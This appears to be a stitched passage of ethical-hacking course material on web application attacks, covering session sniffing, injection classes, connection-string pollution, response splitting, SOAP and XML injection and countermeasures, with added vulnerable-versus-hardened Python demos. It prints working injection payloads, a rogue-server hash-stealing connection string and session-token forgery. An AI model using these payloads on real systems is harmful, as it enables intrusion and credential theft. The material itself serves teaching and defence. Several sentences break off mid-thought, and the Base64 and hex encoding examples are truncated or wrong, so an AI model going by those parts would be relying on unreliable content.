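PAGE_TOKEN = ("%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
              "%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30")

if __name__ == "__main__":
    print(decode_token(PAGE_TOKEN))
    print(decode_token(forge_token(PAGE_TOKEN, "user", "admin")))
    print(looks_sequential(["user01", "user02", "user03"]), new_session_id())
```

A token that survives decode_token with a readable result, or a sample that looks_sequential, fails the randomness requirement the text describes regardless of how long it is.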
Session Sniffing
Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are used as the transmission mechanism for session tokens and the Secure flag is not set, the browser also sends them over plain HTTP, where they can be captured and replayed to gain unauthorized access to the application. Attackers can use captured session cookies to perform session hijacking, session replay, and man-in-the-middle attacks.
Wireshark
Source: http://www.wireshark.org
Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Captured files can be programmatically edited via the command line.
Wireshark screenshot: packet list (TCP, DHCPv6 and HTTP frames between 10.0.0.5 and 123.108.40.33); the packet bytes pane shows an HTTP response carrying Set-Cookie headers with expires, path and domain attributes, Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, and a Server: Apache header.
Injection Attacks
In injection attacks, attackers supply crafted malicious input that is syntactically correct according to the interpreted language being used, in order to break out of the application's intended data context.
Web Scripts Injection: If user input is used in code that is dynamically executed, enter crafted input that breaks the intended data context and executes commands on the server.
OS Commands Injection: Exploit the operating system by entering malicious commands in input fields if the application uses user input in a system-level command.
SMTP Injection: Inject arbitrary SMTP commands into the conversation between the application and the SMTP server to generate large volumes of spam email.
SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database.
LDAP Injection: Take advantage of non-validated web application input to pass crafted LDAP filters and obtain unauthorized access to the directory behind the application.
XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic.
Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection.
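The following is an added example, not part of the course material, for two of the injection classes listed above: an OS command injection in a "resolve this host" feature, shown vulnerable and hardened, and the escaping that stops LDAP filter injection. The command is echo so the demo runs offline (a real feature would call nslookup or ping); the hostname allowlist and the LDAP filter shape are assumptions for the demo.

```python
import re
import subprocess

# Allowlist for a DNS hostname: labels of letters, digits and hyphens, dot-separated
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def lookup_vulnerable(host):
    """shell=True hands the concatenated string to /bin/sh, so ';', '|' and
    '$(...)' inside `host` are interpreted as commands."""
    cmd = "echo resolving " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_hardened(host):
    """Validate against the allowlist, then pass the value as a single argv element
    so no shell ever parses it (the second measure holds even if the first is skipped)."""
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname")
    return subprocess.run(["echo", "resolving", host],
                          capture_output=True, text=True).stdout


def ldap_escape(value):
    """Escape the RFC 4515 filter metacharacters; the backslash goes first so the
    escapes it produces are not re-escaped."""
    return (value.replace("\\", "\\5c").replace("*", "\\2a")
            .replace("(", "\\28").replace(")", "\\29").replace("\x00", "\\00"))


def ldap_login_filter(username):
    """Assumed filter shape for a login lookup; the user name is the only untrusted part."""
    return f"(&(uid={ldap_escape(username)})(objectClass=person))"


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"
    print(lookup_vulnerable(payload))
    try:
        lookup_hardened(payload)
    except ValueError as e:
        print("hardened rejected it:", e)
    print(ldap_login_filter("*)(uid=*"))
```

Without the escaping, the user name "*)(uid=*" would close the uid clause early and turn the login filter into one that matches every person in the directory.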
Data Connectivity Attacks
Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries. Three kinds are covered here:
Connection String Injection
Connection String Parameter Pollution (CSPP) Attacks
Connection Pool DoS

Example of a common connection string used to connect to a Microsoft SQL Server database:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"
Connection String Injection

Before injection:
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

After injection:
"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off"

In a delegated authentication environment, where the user is asked for a user name and password that the application concatenates into the connection string, the attacker can inject additional parameters simply by appending a semicolon (;). Here the attacker enters the password as "pwd; Encryption=off", which turns off encryption of the database connection. The resulting connection string becomes:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off"

When the connection string is populated, the injected encryption value is added to the previously configured set of parameters. (These examples use the keyword "Encryption"; the keyword SqlClient actually recognizes is "Encrypt", but the injection mechanism is identical.)
Connection String Parameter Pollution (CSPP) Attacks

Hash Stealing
An attacker replaces the value of the Data Source parameter with that of a rogue Microsoft SQL Server connected to the Internet and running a sniffer:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Rogue_Server; Password=; Integrated Security=true;

The attacker then sniffs Windows credentials (password hashes) when the application tries to connect to Rogue_Server with the Windows credentials it is running under.

Port Scanning
The attacker tries to connect to different ports by changing the port value (for example, Target_Port=443) and observing the error messages obtained:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Target_Server,Target_Port; Password=; Integrated Security=true;

Hijacking Web Credentials
The attacker tries to connect to the database using the web application's system account instead of a user-provided set of credentials:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Target_Server,Target_Port; Password=; Integrated Security=true;

In all three cases the injected "Integrated Security=true" overrides the earlier "integrated security=no" because when a keyword is repeated the last occurrence wins, so the connection is made with the web application's Windows identity rather than with the supplied user ID and password.
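The following is an added example, not part of the course material, covering both the "pwd; Encryption=off" injection and the CSPP strings above. It parses a connection string the way the attacks rely on (last keyword wins), shows what a builder that concatenates user input yields, and gives a builder that refuses the separator characters. The keyword names follow the page's examples; the parser is a simplification of SqlClient's (it ignores quoted values).

```python
TEMPLATE = ("Data Source={server}; Network Library=DBMSSOCN; Initial Catalog={db}; "
            "User ID={user}; Password={password};")


def parse_connection_string(cs):
    """Split on ';' and keep the LAST value for each keyword (case- and
    space-insensitive), which is the precedence the CSPP examples exploit."""
    result = {}
    for part in cs.split(";"):
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        result[key.strip().lower().replace(" ", "")] = value.strip()
    return result


def build_naive(user, password, server="Server,Port", db="DataBase"):
    """Concatenates the user-supplied credentials straight into the string."""
    return TEMPLATE.format(server=server, db=db, user=user, password=password)


def build_safe(user, password, server="Server,Port", db="DataBase"):
    """Rejects anything that could start a new keyword. A builder that quotes values
    (as SqlConnectionStringBuilder does) is the more general fix; refusing ';' and
    '=' in credentials is the simplest correct one."""
    for name, value in (("User ID", user), ("Password", password)):
        if any(ch in value for ch in ";=\"'"):
            raise ValueError(f"{name} contains connection string syntax characters")
    return build_naive(user, password, server, db)


if __name__ == "__main__":
    print(parse_connection_string(build_naive("Username", "pwd; Encryption=off")))
    cspp = build_naive(";Data Source=Rogue_Server", "; Integrated Security=true")
    print(parse_connection_string(cspp))
    try:
        build_safe("Username", "pwd; Encryption=off")
    except ValueError as e:
        print("rejected:", e)
```

With the naive builder the CSPP input turns "integrated security=no" into "true" and points Data Source at the rogue server; with the safe builder the same input never reaches the driver.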
Connection Pool DoS
The attacker constructs a large malicious SQL query and runs multiple copies of it simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users.

Example: by default in ASP.NET (SqlClient) the maximum number of connections in the pool is 100 and the command timeout is 30 seconds. Thus an attacker who starts 100 queries that each execute for 30+ seconds, all within the same 30-second window, exhausts the pool; every other request then waits for a pooled connection until its connection timeout (15 seconds by default) expires and fails, so no one else can use the database-related parts of the application.
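The following is an added example, not part of the course material, that simulates the pool exhaustion described above with the page's figure of 100 connections, and one mitigation: a per-client cap on concurrent connections. Timings are not slept through; the model assumes the attacker's queries all outlast the window, which is exactly the case the text describes.

```python
class PoolExhausted(Exception):
    """Stands in for SqlClient's 'Timeout expired ... obtaining a connection from the pool'."""


class ConnectionPool:
    def __init__(self, max_size=100, per_client_limit=None):
        self.max_size = max_size
        self.per_client_limit = per_client_limit   # None reprodu ces the default: no cap
        self.in_use = {}                           # client -> connections currently held

    def acquire(self, client):
        if sum(self.in_use.values()) >= self.max_size:
            raise PoolExhausted("no pooled connection became available")
        if (self.per_client_limit is not None
                and self.in_use.get(client, 0) >= self.per_client_limit):
            raise PoolExhausted(f"{client} is over its concurrency quota")
        self.in_use[client] = self.in_use.get(client, 0) + 1

    def release(self, client):
        self.in_use[client] -= 1


def simulate(pool, attacker_queries=100):
    """The attacker starts `attacker_queries` long-running queries at once (none of
    them finishes inside the window); then a legitimate user asks for one connection.
    Returns (connections the attacker obtained, whether the legitimate request was served)."""
    obtained = 0
    for _ in range(attacker_queries):
        try:
            pool.acquire("attacker")
            obtained += 1
        except PoolExhausted:
            break
    try:
        pool.acquire("legit")
        served = True
    except PoolExhausted:
        served = False
    return obtained, served


if __name__ == "__main__":
    print("default pool:      ", simulate(ConnectionPool()))
    print("per-client cap 10: ", simulate(ConnectionPool(per_client_limit=10)))
```

The per-client cap keeps 90 connections free for everyone else; in a real deployment it is combined with a command timeout shorter than the connection timeout, so that slow queries give their connection back before waiting callers give up.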
Redirection Attacks
Frame Injection
Session Fixation
ActiveX Attacks
Cross-Site Scripting
Privacy Attacks
Cross-Site Scripting
An attacker bypasses the client-side security mechanism, gains access privileges, and injects malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.

HTTP Header Injection
An attacker splits the HTTP response into multiple responses by injecting a malicious response into the HTTP headers (HTTP response splitting: CR/LF characters in a header value that is built from user input). This attack can deface websites, poison caches, and trigger cross-site scripting.
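The following is an added example, not part of the course material, of the header injection just described: a redirect handler that writes a user-supplied target into the Location header, the CR/LF payload that splits its response into two, and the hardened handler that rejects control characters and also refuses off-site targets (the open-redirect case from the "Redirection Attacks" list). SITE_HOST and the raw response bytes are assumptions for the demo.

```python
from urllib.parse import urlsplit

SITE_HOST = "www.juggyboy.com"   # assumed host; absolute redirect targets must stay here


def redirect_vulnerable(target):
    """Copies the user-supplied target straight into the Location header."""
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\nContent-Length: 0\r\n\r\n".encode()


def redirect_hardened(target):
    """Rejects CR, LF and NUL (which would split the response), then requires the
    target to be an absolute local path or an https URL on this site."""
    if any(ch in target for ch in "\r\n\x00"):
        raise ValueError("control character in redirect target")
    parts = urlsplit(target)
    if parts.scheme not in ("", "https") or (parts.netloc and parts.netloc != SITE_HOST):
        raise ValueError("redirect target must stay on this site")
    if not parts.scheme and not target.startswith("/"):
        raise ValueError("relative target must be an absolute path")
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\nContent-Length: 0\r\n\r\n".encode()


def count_responses(raw):
    """How many HTTP responses a downstream cache or browser would parse out of `raw`."""
    return raw.count(b"HTTP/1.1 ")


# Constructed payload: ends the real 302, then supplies a complete second response
# whose body is attacker-controlled HTML (25 bytes, matching its Content-Length)
SPLIT_PAYLOAD = ("/home\r\nContent-Length: 0\r\n\r\n"
                 "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 25\r\n\r\n"
                 "<script>alert(1)</script>")

if __name__ == "__main__":
    print(redirect_vulnerable(SPLIT_PAYLOAD).decode())
    try:
        redirect_hardened(SPLIT_PAYLOAD)
    except ValueError as e:
        print("hardened rejected it:", e)
```

The second response in the split output is what a shared cache stores for /home if it associates it with the next request on the same connection; that is the cache poisoning and stored XSS the text refers to.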
Frame Injection
When scripts do not validate their input, the attacker injects code through frames. This affects all browsers and scripts that do not validate untrusted input. These vulnerabilities occur in HTML pages with frames; the other reason for the vulnerability is that web browsers allow the content or target of a frame to be replaced by script.

Cross-Site Request Forgery
Cross-site request forgery abuses the trust a site places in the user's browser. The attack works by including a link in a page that accesses a site to which the user is authenticated.

Session Fixation
Session fixation helps an attacker hijack a valid user session. The attacker first obtains a session ID the application will accept (for example by visiting the site), then tricks the user into accessing the genuine web server with that existing session ID value, for instance through a crafted link. Once the user authenticates, the session the attacker already knows has become the user's validated session, and the attacker hijacks it simply by presenting the known session ID.

ActiveX Attacks
The attacker lures the victim via email or a link crafted so that a remote code execution flaw in an ActiveX control becomes reachable. Attackers gain equal
Attack Web Services
Web services work atop legacy web applications, and any attack on a web service will immediately expose an underlying application's business and logic vulnerabilities to various attacks. As more functionality is exposed through web services, the available attack surface increases, and the attacker can exploit those vulnerabilities to compromise the web services. There may be many reasons for attacking web services, and the attacker chooses the attack according to the purpose: if the intention is to stop a web service from serving its intended users, the attacker can launch a denial-of-service attack by sending numerous requests. The various types of attack used against web services are:
SOAP Injection
XML Injection
WSDL Probing Attacks
Information Leakage
Application Logic Attacks
Database Attacks
DoS Attacks
Web Services Probing Attacks
In the first step, the attacker captures the WSDL document from web service traffic and analyzes it to determine the purpose of the application, its functional breakdown, entry points, and message types. These attacks work similarly to SQL injection attacks.
The attacker then creates a set of valid requests by selecting a set of operations and formulating the request messages according to the rules of the XML Schema, so that they can be submitted to the web service. The attacker uses these requests to include malicious content in SOAP requests and analyzes the resulting errors to gain a deeper understanding of potential security weaknesses.
Figure: SOAP injection against http://juggyboy.com/ws/products.asmx. The attacker injects an arbitrary character (') into the name field of the GetProductInformationByName request (uid 312-111-8543, password 5648). The server answers with a SOAP fault whose faultstring discloses the back-end query and stack trace: "System.Web.Services.Protocols.SoapException: Server was unable to process request -> System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression 'productname like ''' and providerid = '312-111-8543''", followed by the call chain through ProductInfo.ProductDBAccess.GetProductInformation(String productName, String uid, String password).
Figure: Server response to a legitimate request: productid 25, productName Painting101, productQuantity 3, productPrice 1500.
Figure: With the name field set to % and the password field set to ' Or 1=1 Or blah = 1, the web service returns the same product information without a valid password.
XML Injection
Attackers inject XML data and tags into user input fields to manipulate the XML schema or populate an XML database with bogus entries. XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks.
FIGURE 13.55: XML Injection. In the Account Login form at http://juggyboy.com/ws/login.asmx the attacker registers with Username Mark, Password 12345 and an E-mail value of mark@certifiedhacker.com</mail></user><user><username>Jason</username><password>attack</password><userid>105</userid><mail>jason@juggyboy.com. Because the form values are written directly into the XML user store, the resulting document contains both the intended <user> record (Mark, userid 102) and an extra, attacker-defined <user> record (Jason, userid 105).
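How the Figure 13.55 payload behaves against a string-templated XML store and against one that entity-escapes its values, as an added example that is not part of the CEH material; the template, the e-mail pattern and the size limit are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed e-mail value modelled on the payload in Figure 13.55: it closes the
# current <user> element and appends a second, attacker-chosen account.
INJECTED_MAIL = ("mark@certifiedhacker.com</mail></user>"
                 "<user><username>Jason</username><password>attack</password>"
                 "<userid>105</userid><mail>jason@juggyboy.com")

TEMPLATE = ("<users><user><username>%s</username><password>%s</password>"
            "<userid>%s</userid><mail>%s</mail></user></users>")

def build_user_record_unsafe(username, password, userid, mail):
    # Vulnerable: form values are pasted into the markup, so '<' and '>' in the
    # e-mail field are interpreted as XML structure.
    return TEMPLATE % (username, password, userid, mail)

def build_user_record_safe(username, password, userid, mail):
    # Hardened: entity-escape every value (& < > become &amp; &lt; &gt;), so the
    # same payload is stored as literal text inside the single <mail> element.
    return TEMPLATE % tuple(escape(v) for v in (username, password, userid, mail))

def count_user_records(xml_text):
    """Parses the stored document and counts <user> elements (1 is the expected result)."""
    return len(ET.fromstring(xml_text).findall("user"))

def stored_mail(xml_text):
    """Returns the text the parser sees inside the first <mail> element."""
    return ET.fromstring(xml_text).find("user/mail").text

# Positive validation: the e-mail field may contain only characters an address needs,
# which rejects the payload before it ever reaches the XML layer.
MAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def is_valid_mail(value):
    return MAIL_RE.match(value) is not None

# Guard against the oversized-payload form of web services parsing attacks:
# refuse documents above a fixed size before handing them to the parser.
MAX_DOCUMENT_BYTES = 64 * 1024

def parse_bounded(xml_text, limit=MAX_DOCUMENT_BYTES):
    if len(xml_text.encode("utf-8")) > limit:
        raise ValueError("XML document exceeds %d bytes" % limit)
    return ET.fromstring(xml_text)
```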
Web Services Parsing Attacks
Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a denial-of-service condition or to generate logical errors in web service request processing.
The attacker queries the web service with a grammatically correct SOAP document that contains infinite processing loops, resulting in exhaustion of XML parser and CPU resources.
Attackers send a payload that is excessively large to consume all system resources, rendering the web services inaccessible to other legitimate users.
soapUI
soapUI is an open source functional testing tool, mainly used for web service testing. It supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. An attacker can use this tool to carry out web services probing, SOAP injection, XML injection, and web services parsing attacks.
Altova XMLSpy
Altova XMLSpy is the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies.
It offers a graphical schema designer, Smart Fix validation, a code generator, file converters, debuggers, profilers, full database integration, and support for WSDL, SOAP, XSLT, XPath, XQuery, XBRL, and Open XML documents, plus Visual Studio and Eclipse plug-ins, and more.
Module Flow
So far, we have discussed web application concepts, threats associated with web applications, and the hacking methodology. Now we will discuss hacking tools. These tools help attackers retrieve sensitive information and also craft and send malicious packets or requests to the victim. Web application hacking tools are especially designed for identifying vulnerabilities in a web application. With the help of these tools, the attacker can easily exploit the identified vulnerabilities and carry out web application attacks.
Web Application Hacking Tools
This section lists and describes various web application hacking tools such as Burp Suite Professional, CookieDigger, WebScarab, and so on.
Burp Suite
Source: http://www.portswigger.net
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface through to finding and exploiting security vulnerabilities. Burp Suite contains key components such as an intercepting proxy, an application-aware spider, an advanced web application scanner, an intruder tool, a repeater tool, a sequencer tool, etc.
CookieDigger
Source: http://www.mcafee.com
CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications.
The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, is included in the cookie values.
WebScarab
responses) that have passed through WebScarab.
HttpBee: http://www.oOo.nu
w3af: http://w3af.sourceforge.net
Teleport Pro: http://www.tenmax.com
GNU Wget: http://gnuwin32.sourceforge.net
WebCopier
BlackWidow: http://softbytelabs.com
HTTrack: http://www.httrack.com
cURL: http://curl.haxx.se
MileSCAN ParosPro: http://www.milescan.com
Module Flow
So far, we have discussed various concepts such as threats associated with web applications, hacking methodology, and hacking tools. All these topics talk about how the attacker breaks into a web application or a website. Now we will discuss web application countermeasures. Countermeasures are the practice of using multiple security systems or technologies to prevent intrusions. They are the key components for protecting and safeguarding the web application against web application attacks.
Countermeasures
This section highlights various ways in which you can defend against web application attacks such as SQL injection attacks, command injection attacks, XSS attacks, etc.
Encoding Schemes
Web applications employ different encoding schemes for their data to safely handle unusual characters and binary data in the way you intend.
The HTTP protocol and the HTML language are the two major components of web applications. Both of these are text based. Web applications employ encoding schemes to ensure that both components handle unusual characters and binary data safely. The encoding schemes include:
URL Encoding
when they are mentioned in the URL scheme or HTTP protocol. Hence, such characters are restricted. URL encoding is the process of converting URLs into valid ASCII format so that data can be safely transported over HTTP. URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as %3d.
HTML Encoding
The HTML encoding scheme is used to represent unusual characters so that they can be safely entered within an HTML document as part of its content. The structure of the document is defined by various characters. If you want to use the same characters as part of the document's content, you may face a problem. This problem can be overcome by using HTML encoding. It defines several HTML entities to represent particular characters, such as &amp; for &, &lt; for <, and &gt; for >.
Encoding Schemes (Cont'd)
Base64 Encoding
Base64 schemes are used to encode binary data. A Base64 encoding scheme represents any binary data using only printable ASCII characters. It is usually used for the safe transmission of binary data. Example:
cake
01100011 01100001 01101011 01100101
Base64 Encoding: 011000
Hex Encoding
A hex encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data. Example:
Hello Jason
A125C458D8 123B684AD9
Unicode encoding examples: %u2215 %u00e9
UTF-8
UTF-8 is a variable-length encoding standard in which each byte is expressed in hexadecimal and preceded by the % prefix: %c2%a9 %e2%89%a0
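The encoding schemes above carried out on the page's own sample values (%3d, %c2%a9, %e2%89%a0, the cake bit string, %u00e9), plus the decode-until-stable check a validator needs before inspecting input; this is an added example, not code from the CEH material, and the round limit in canonicalize is an assumption.

```python
import base64
import binascii
import html
import urllib.parse

# RFC 3986 unreserved characters: everything else is percent-encoded.
UNRESERVED = frozenset(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~")

def percent_encode(text):
    """URL / UTF-8 encoding: each UTF-8 byte outside the unreserved set becomes '%'
    plus its two hex digits, so '=' -> %3d and the copyright sign -> %c2%a9."""
    return "".join(chr(b) if b in UNRESERVED else "%%%02x" % b
                   for b in text.encode("utf-8"))

def percent_decode(text):
    return urllib.parse.unquote(text)

def html_entity_encode(text):
    """HTML encoding: the characters that define document structure become entities
    (& -> &amp;, < -> &lt;, > -> &gt;, quotes -> &quot; / &#x27;)."""
    return html.escape(text, quote=True)

def base64_encode(data):
    """Base64: binary data as printable ASCII, 3 bytes -> 4 characters, '=' padding."""
    return base64.b64encode(data).decode("ascii")

def hex_encode(data):
    """Hex encoding: two hex digits per byte."""
    return binascii.hexlify(data).decode("ascii").upper()

def unicode_u_encode(text):
    """The %uXXXX form of Unicode encoding used by some web stacks (e.g. %u00e9 for e-acute)."""
    return "".join(c if c.isascii() and c.isalnum() else "%%u%04x" % ord(c) for c in text)

def bit_string(data):
    """The binary view used in the 'cake' example: eight bits per byte, space separated."""
    return " ".join(format(b, "08b") for b in data)

def canonicalize(text, max_rounds=3):
    """Defender's step before validation: percent-decode until the value stops changing,
    so double-encoded input (%253c -> %3c -> '<') is checked in its final form.
    Input still changing after max_rounds (an assumed limit) is rejected, not guessed at."""
    for _ in range(max_rounds + 1):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            return text
        text = decoded
    raise ValueError("input still encoded after %d rounds" % max_rounds)

def decodes_cleanly(text, max_rounds=3):
    try:
        canonicalize(text, max_rounds)
        return True
    except ValueError:
        return False
```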
How to Defend Against SQL Injection Attacks
Always use the method attribute set to POST.
Run the database service account with minimal rights.
Move extended stored procedures to an isolated server.
Use type-safe variables or functions such as IsNumeric() to ensure type safety.
Validate and sanitize user inputs passed to the database.
Use a low-privileged account for the DB connection.
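A concatenated query next to its parameterized form, run against a table modelled on the GetProductInformationByName service in the figures above, as an added example that is not part of the CEH material; the table contents, the second row, the uid pattern and the bypass payload are constructed.

```python
import re
import sqlite3

# Constructed table modelled on the GetProductInformationByName service in the figures:
# a product is looked up by name, provider id (uid) and password.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (productid INTEGER, productname TEXT, "
                 "providerid TEXT, password TEXT, productprice INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?, ?)", [
        (25, "Painting101", "312-111-8543", "5648", 1500),
        (26, "Sculpture202", "555-000-0001", "9999", 2300),   # constructed second row
    ])
    return conn

def lookup_unsafe(conn, name, uid, password):
    # Vulnerable: input is concatenated into the SQL text. A quote in any field ends the
    # string literal early, so the rest of the field is parsed as SQL.
    sql = ("SELECT productid, productname, productprice FROM products "
           "WHERE productname LIKE '%s' AND providerid = '%s' AND password = '%s'"
           % (name, uid, password))
    return conn.execute(sql).fetchall()

def lookup_safe(conn, name, uid, password):
    # Hardened: parameterized query. The driver sends the values separately from the
    # statement, so they are only ever compared as data.
    sql = ("SELECT productid, productname, productprice FROM products "
           "WHERE productname LIKE ? AND providerid = ? AND password = ?")
    return conn.execute(sql, (name, uid, password)).fetchall()

def outcome(fn, conn, name, uid, password):
    """Runs a lookup and returns ('ok', rows) or ('error', message); the error branch is
    what the SOAP fault in the figure leaked to the caller."""
    try:
        return ("ok", fn(conn, name, uid, password))
    except sqlite3.Error as exc:
        return ("error", str(exc))

# Type-safety check in the spirit of IsNumeric(): the uid must have the fixed
# NNN-NNN-NNNN shape used by the service before it reaches either query.
UID_RE = re.compile(r"^\d{3}-\d{3}-\d{4}$")

def is_valid_uid(uid):
    return UID_RE.match(uid) is not None

# Constructed payload modelled on the "' Or 1=1 Or blah = 1" password in the figure.
BYPASS_PASSWORD = "' OR 1=1 OR 'a'='a"
```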
How to Defend Against Command Injection Attacks
wherever possible. Some language-specific libraries perform identical functions for many shell commands and some system calls. These libraries do not contain the operating system shell interpreter, and so avoid most shell command problems. For those calls that must still be used, such as calls to backend databases, one must carefully validate the data to ensure that it does not contain malicious content. One can also arrange the various requests in a pattern which ensures that all given parameters are treated as data instead of potentially executable content. Most system calls, the use of stored procedures with parameters that accept valid input strings to access a database, and prepared statements provide significant protection, ensuring that the supplied input is treated as data; this reduces, but does not completely eliminate, the risk involved in these external calls. One can always authorize the input to ensure the protection of the application in question. Least-privileged accounts must be used to access a database so that there is the smallest possible loophole. The other strong protection against command injection is to run web applications with only the privileges required to carry out their functions.
Therefore, one should avoid running the web server as root, or accessing a database as a DB ADMIN, or else an attacker may be able to misuse administrative rights. The use of the Java sandbox in J2EE environments stops the execution of system commands.
wrong. Otherwise, an attack may occur and never be detected.
Perform input validation.
Use language-specific libraries that avoid problems due to shell commands.
Use a safe API that avoids the use of the interpreter entirely.
Use parameterized SQL queries.
Escape dangerous characters.
Perform input and output encoding.
Structure requests so that all supplied parameters are treated as data, rather than potentially executable content.
Use modular shell disassociation from the kernel.
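The "safe API that avoids the interpreter" and "input validation" items above, shown side by side with the shell-string form they replace, as an added example that is not part of the CEH material; the child program standing in for the external tool, the IP-only host rule and the tainted input are constructed assumptions (the example needs a POSIX shell for the vulnerable path).

```python
import ipaddress
import subprocess
import sys

# A small program that stands in for the external tool (e.g. ping) the web application
# calls; it simply prints its first argument. Using the interpreter itself keeps the
# demonstration self-contained.
CHILD = [sys.executable, "-c", "import sys; print(sys.argv[1])"]

def run_unsafe(user_value):
    """Vulnerable: the command line is built as a string and handed to the shell
    (shell=True). Metacharacters in user_value (';', '|', backticks) start extra commands."""
    cmdline = "%s -c 'import sys; print(sys.argv[1])' %s" % (sys.executable, user_value)
    return subprocess.run(cmdline, shell=True, capture_output=True, text=True).stdout

def run_safe(user_value):
    """Safe API: an argument vector executed without any shell interpreter, so the whole
    value, metacharacters included, reaches the child as one argument."""
    return subprocess.run(CHILD + [user_value], capture_output=True, text=True).stdout

def is_valid_host(value):
    """Positive input validation for this call: only an IP literal is accepted; anything
    else (names, spaces, shell syntax) is rejected before a process is ever started."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def ping_argv(host):
    """Argument vector for the real tool, built only after validation (not executed here)."""
    if not is_valid_host(host):
        raise ValueError("refusing host value: %r" % host)
    return ["ping", "-c", "1", host]

# Constructed input: a valid-looking host (TEST-NET range) followed by a second command.
TAINTED = "203.0.113.5; echo INJECTED"
```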
How to Defend Against XSS Attacks
Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification.
Encode input and output and filter metacharacters in the input.
Use testing tools extensively during the design phase to eliminate such XSS holes in the application before it goes into use.
Do not always trust websites that use HTTPS when it comes to XSS.
Develop some standard or signing scripts with private and public keys that actually check to ascertain that the script introduced is really authenticated.
Convert all non-alphanumeric characters to HTML character entities before displaying the user input in search engines and forums.
Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users.
vulnerability is discovered in one website, there is a high chance of it being vulnerable to
cookies, query string form fields, and hidden fields. During the validation process, there must be no attempt to recognize the active content, neither to remove the filter nor sanitize it. There are many ways to encode the known filters for active content. A "positive security policy" is highly recommended, which specifies what has to be allowed and what has to be removed. Negative or attack signature-based policies are hard to
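The "convert all non-alphanumeric characters to HTML character entities" rule and the positive security policy from the notes above, applied to a reflected search term, as an added example that is not part of the CEH material; the search-term pattern, the page template and the probe string are constructed.

```python
import html
import re

def entity_encode_non_alphanumeric(text):
    """The rule above: every character other than A-Z, a-z, 0-9 is replaced by its numeric
    HTML character entity, so nothing in user input can be read as a tag or attribute."""
    return "".join(c if c.isascii() and c.isalnum() else "&#%d;" % ord(c) for c in text)

def round_trips(text):
    """Encoding changes how the browser parses the value, not the value itself."""
    return html.unescape(entity_encode_non_alphanumeric(text)) == text

# Positive security policy for one field: a search term is letters, digits and spaces,
# 1 to 64 characters (constructed rule). Anything else is rejected instead of "cleaned".
SEARCH_TERM_RE = re.compile(r"^[A-Za-z0-9 ]{1,64}$")

def accept_search_term(value):
    return SEARCH_TERM_RE.match(value) is not None

def render_search_header(term):
    """Output encoding at the point where the value is placed into the page."""
    return "<p>Results for: %s</p>" % entity_encode_non_alphanumeric(term)

def user_part_contains_markup(rendered):
    """True if the encoded user portion still contains raw angle brackets."""
    body = rendered[len("<p>Results for: "):-len("</p>")]
    return "<" in body or ">" in body

# Constructed reflected-XSS probe string.
PROBE = "<script>alert(1)</script>"
```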
How to Defend Against Web Services Attacks
Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages.
Use multiple security credentials such as X.509 certificates, SAML assertions, and WS-Security.
Block external references and use pre-fetched content when de-referencing URLs.
Deploy web-services-capable firewalls capable of SOAP- and ISAPI-level filtering.
Maintain and update a secure repository of XML schemas.
Broken Authentication and Session Management
Use SSL for all authenticated parts of the application.
